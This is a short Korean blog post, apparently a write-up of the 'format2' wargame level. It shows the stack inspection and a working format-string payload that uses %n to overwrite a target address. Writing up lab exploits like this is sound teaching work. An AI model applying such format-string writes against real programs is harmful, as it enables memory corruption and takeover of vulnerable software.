main
vuln (보니 0x80496e4가 target 주소인 듯 하다.)
스택에 있는 값 4개 출력했더니 앞에 AAAA 입력해줬던 41414141이 나왔다.
5번째에 target 주소 저장되는 것을 볼 수 있다.
%n은 앞에 나온 공간 갯수를 주어진 주소에 저장하는 것이므로 64바이트를 맞춰주었다.
payload : (python -c 'print "AAAA" + "\xe4\x96\x04\x08" + "%08x%08x%08x%32c%n"') | ./format2
'LiveOverFlow' 카테고리의 다른 글
Format 3 (0) | 2020.11.04 |
---|---|
Format 1 (0) | 2020.11.03 |
Format 0 (0) | 2020.11.01 |